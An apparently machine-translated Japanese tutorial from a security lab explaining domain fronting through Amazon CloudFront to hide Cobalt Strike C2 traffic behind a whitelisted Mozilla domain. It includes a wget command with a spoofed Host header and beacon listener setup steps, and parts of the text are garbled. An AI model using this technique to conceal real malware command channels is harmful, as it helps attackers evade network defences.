制作★MS08067ラボ(www.ms08067.com)
サウザンドマイル百科事典
クーポンm.fenfaw.cnドメインフロンティングは、ドメインフロントエンドネットワーク攻撃テクノロジーとしても知られるHTTPS一般回避テクノロジーに基づいています。これは、MetasploitやCobalt Strikeなどのチームによるサーバートラフィックの制御を隠蔽して、チェッカーやファイアウォールの検出をある程度バイパスするために使用されるテクノロジーです。Amazon、Google、Akamaiなどの大手ベンダーが提供します。一部のドメインフロントエンド技術サービス。
次の例では、Amazonを使用してCloudFront(CDN)サービスを提供します。
バックグラウンド
仮想ホストに複数のウェブサイトサービスを設定します。それらを区別しやすくするために、IP +ポート名などでアクセスできますが、SSL / TLSの場合はアクセスできます。HTTPSの動作原理によれば、ブラウザがHTTPSサイトにアクセスすると、最初にサーバーとのSSL接続が確立されます。
接続を確立するための最初のステップは、サーバーの証明書を要求することです。サーバーが証明書を送信するとき、ブラウザがアクセスしているドメイン名がわからないため、異なるドメイン名に従って異なる証明書を送信することはできません。そのため、SNIと呼ばれる拡張機能が導入されています。SNIは、サーバーが使用する複数のドメイン名と証明書のSSL / TLS拡張機能を解決するためのものです。方法は、ClientHelloにホスト情報を入力することです。
ドメインフロントエンドの重要なアイデアは、さまざまな通信レイヤーでさまざまなドメイン名を使用することです。これは、インターネットの検閲を回避するために、接続の実際のエンドポイントを非表示にするテクノロジーです。アプリケーション層で動作している場合、ドメインフロントを使用すると、ユーザーはブロックされたサービスにHTTPS経由で接続できますが、表面上はまったく別のサイトと通信しているように見えます。
このテクノロジーの原則は、さまざまな通信レイヤーでさまざまなドメイン名を使用することです。無害なドメイン名は、接続を開始するためにプレーンテキストのDNS要求とTLSサーバー名表示(SNI)で使用され、接続されるブロックされたドメイン名は、暗号化されたHTTPS接続が作成された後にのみ送信され、ホストヘッダーに別の悪意のあるものが含まれますC2ドメイン名(ホストヘッダーはインスペクターには表示されませんが、HTTPS要求を受信するフロントエンドサーバーには表示されます)。
デモ
Amazon CloudFrontは、コンテンツ配信ネットワークサービスです。サーバーでホストされているファイルのグローバル分散キャッシュをユーザーに提供します。これにより、クライアントのサーバーの負荷が軽減され、CDNがリクエスターのデータセンターからキャッシュされたコンテンツを提供できるようになります。クライアントがCloudFrontに接続すると、HOSTヘッダーに基づいてクライアントがリクエストするドメイン名が決定されます。攻撃を設定するには、CloudFrontで「https://docs.telemetry.mozilla.org」などの信頼できるドメイン名を選択するだけです。これは、正当なホワイトリストに登録されたドメイン名のようです。これをフロントドメイン名として使用して回避します。ファイアウォールレビュー。
Amazon CloudFrontでアカウントを申請してCloudFrontを作成し、「Origin Domain Name」にGodsong.testなどの独自のC&Cコントローラードメイン名を記述し、必要に応じてその他の設定を行います。
アプリケーションが完了すると、ランダムドメイン名xxx.cloudfront.netスタイルが自動的に配布され、発行されたランダムドメイン名が実際のC2サーバーを指すようになります。ユーザーがこのドメイン名にアクセスすると、実際のC&Cサーバー。
ドメイン名の事前配置では、正当な事前ドメイン名が餌として使用されるため、HTTPSリンクを使用する場合、DNS要求も正当なドメイン名であり、HOSTでの変更要求は、転送と同等のC&Cサーバーに送信されます。正当なドメイン名をリクエストした後のトラフィック。トランジットWebにアクセスします。
CloudFrontによってドメイン名が割り当てられ、それが私のC&Cアドレスに転送され、6.txtという名前のメモ帳が元のC&CサーバーWebにアドレスhttps://www.godsong.test/6.txtで保存されました。
Awsによって発行されたドメイン名https://d305blu4121c3m.cloudfront.net/6.txtにアクセスすると、元のトラフィック転送を返すことができ、テストが成功したことを示します。
有効なホワイトリストをフロントドメイン名として使用し、ホストポイントをC&Cドメイン名に変更します。
wget -U demo -q -O- docs.telemetry.mozilla.org/6.txt --header
"Host:d305blu4121c3m.cloudfront.net"
次の図は、Mozillaのホワイトリストドメインテクノロジーを使用して、実際の悪意のあるトラフィックを隠すことに成功したことを示しています。
実際のアプリケーションでは、Cobalt Strike、Empire、Metasploit、およびその他のツールを使用して構成ファイルを変更し、トラフィック送信を制御できます。以下では、Cobalt Strikeを使用して、プロファイル拡張機能をデモンストレーション、セットアップし、ホストヘッダーをd305blu4121c3m.cloudfront.netとして指定します。 。
リスナーを作成すると、ホストはCloudfront.netを書き込んでドメイン名を配布し、ポート80でリッスンします。
ビーコン送信機は、ホワイトリストに登録されたドメイン名を次のように使用します。
悪意のあるプログラムが実行された後、Wiresharkを使用して送信トラフィックパケットをキャプチャします。図に示すように、関連するリクエストは次のとおりです。このようにして、実際のC&Cサーバーアドレスが非表示になります。Wiresharkで表示される送信トラフィックパケットのホストヘッダーも、Cloudfrontサーバーを指します。実際の攻撃者はある程度対処します。
概要:ドメインフロンティングテクノロジー。表示されるドメインはフロントエンドサーバードメインのみであるため、通常のドメイン名か悪意のあるドメイン名かを区別することは困難です。実際、悪意のあるトラフィックは制御対象のエンドサーバーに入る必要があります。一部の悪意のある指紋、ネットワークデータパケットのサイズと時間は、この方法を使用して悪意のある機能の検出などを監視します。
参照
[1] https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1542139101.pdf
図2、図6はこの記事を引用しています
[2] http://www.ert7.com /service/knowledge/3999.html
著者に連絡し、転載のソースを示してください!
Ms08067セキュリティラボは、サイバーセキュリティ知識の普及とトレーニングに重点を置いています。チームは、「Webセキュリティ攻撃と防御:侵入テスト実践ガイド」、「イントラネットセキュリティ攻撃と防御:侵入テスト実践ガイド」、「Pythonセキュリティ攻撃と防御:侵入テスト実践ガイド」、「Javaコードセキュリティ監査(はじめに)」を公開しています。 )」および他の本。
チームの公式アカウントは、CTF射撃場、イントラネットの浸透、APTに関する技術的な乾物をゼロから定期的に共有し、実際の戦闘に焦点を当て、公的なアカウントを共有する実用的な乾物になることを約束します。
公式サイト:https://www.ms08067.com/
以下のQRコードをスキャンして、ラボのVIPコミュニティに参加してください。
参加後、内部VIPグループに招待してください。内部WeChatグループは永続的に有効です。
